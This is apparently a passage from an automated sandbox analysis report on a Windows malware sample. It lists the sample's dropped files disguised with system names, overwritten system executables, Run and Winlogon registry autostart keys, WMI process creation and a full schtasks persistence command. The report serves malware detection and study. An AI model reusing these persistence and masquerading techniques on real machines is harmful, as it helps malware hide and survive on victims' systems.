                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdline
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdlineJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdlineJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 0_2_00007FF848F300BD pushad ; iretd 0_2_00007FF848F300C1
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeCode function: 0_2_00007FF848F343DE push esi; retn 000Bh0_2_00007FF848F343DF
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 11_2_00007FF848F100BD pushad ; iretd 11_2_00007FF848F100C1
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 11_2_00007FF848F143DE push esi; retn 000Bh11_2_00007FF848F143DF
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F837FA pushad ; iretd 12_2_00007FF848F838B1
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F86030 push edx; iretd 12_2_00007FF848F86031
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F3F3FC pushfd ; ret 12_2_00007FF848F3F3FD
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F300BD pushad ; iretd 12_2_00007FF848F300C1
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeCode function: 12_2_00007FF848F343DE push esi; retn 000Bh12_2_00007FF848F343DF
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F300BD pushad ; iretd 29_2_00007FF848F300C1
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F343DE push esi; retn 000Bh29_2_00007FF848F343DF
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F3F3FC pushfd ; ret 29_2_00007FF848F3F3FD
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F837FA pushad ; iretd 29_2_00007FF848F838B1
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 29_2_00007FF848F86030 push edx; iretd 29_2_00007FF848F86031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F637FA pushad ; iretd 30_2_00007FF848F638B1
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F66030 push edx; iretd 30_2_00007FF848F66031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F1F3FC pushfd ; ret 30_2_00007FF848F1F3FD
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F100BD pushad ; iretd 30_2_00007FF848F100C1
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeCode function: 30_2_00007FF848F143DE push esi; retn 000Bh30_2_00007FF848F143DF
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 31_2_00007FF848F200BD pushad ; iretd 31_2_00007FF848F200C1
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 31_2_00007FF848F243DE push esi; retn 000Bh31_2_00007FF848F243DF
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 32_2_00007FF848F043DE push esi; retn 000Bh32_2_00007FF848F043DF
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeCode function: 32_2_00007FF848F000BD pushad ; iretd 32_2_00007FF848F000C1
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F637FA pushad ; iretd 33_2_00007FF848F638B1
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F66030 push edx; iretd 33_2_00007FF848F66031
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F100BD pushad ; iretd 33_2_00007FF848F100C1
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F143DE push esi; retn 000Bh33_2_00007FF848F143DF
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 33_2_00007FF848F1F3FC pushfd ; ret 33_2_00007FF848F1F3FD
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 34_2_00007FF848F1F3FC pushfd ; ret 34_2_00007FF848F1F3FD
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 34_2_00007FF848F637FA pushad ; iretd 34_2_00007FF848F638B1
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeCode function: 34_2_00007FF848F66030 push edx; iretd 34_2_00007FF848F66031
                    Source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, IgtwOf7haQYRmSPKHpT.csHigh entropy of concatenated method names: 'KNf7CrbwDi', 'Dru7tS2emd', 'cIkynFqwA4ILYVq6Y4le', 'f0clSPqwG5C7uqOMyk10', 'FFGPVPqwyMtskGZa3DBH', 'NIZjtYqwiIXXuFgIYKDf', 'hk52ahqwzSmuEMllte89', 'W338d5qljj24NaR3B8Ab', 'ASuIwNqlqxn1YdUDTuND'
                    Source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, kJHYU8BQ26cy2LYJJG3.csHigh entropy of concatenated method names: 'STjBGxso8e', 'cBc44Xq406u6deH9SPiF', 'EZqIi2q4bsUlJPorFL15', 'dJJZbbq4YWMCyJkQ51uM', 'par5TIq4Dqckv0avsc3P', 'SINXhtq4SQSq8CNe2D75', 'nAshalq4U0xCUwHhqGja', 'VwGlQIq4LXPjfNHfHW7A', 'qHxspfq4fXu8cveHeCuu'

                    Persistence and Installation Behavior

                    barindex
                    Creates processes via WMI
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeJump to dropped file
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: unknownExecutable created and started: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe
                    Source: unknownExecutable created and started: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Windows\ImmersiveControlPanel\pris\conhost.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Users\user\Desktop\bveMYDWO.logJump to dropped file
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeFile created: C:\Users\user\Desktop\vnUJHstD.logJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Windows\ImmersiveControlPanel\pris\conhost.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeJump to dropped file
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile created: C:\Users\user\Desktop\bveMYDWO.logJump to dropped file
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeFile created: C:\Users\user\Desktop\vnUJHstD.logJump to dropped file

                    Boot Survival

                    barindex
                    Creates an autostart registry key pointing to binary in C:\Windows
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                    Creates an undocumented autostart registry key
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Creates autostart registry keys with suspicious values (likely registry only malware)
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"Jump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dZtDLPHWGnqMECrRIGtvnULd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe'" /f
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dZtDLPHWGnqMECrRIGtvnULJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
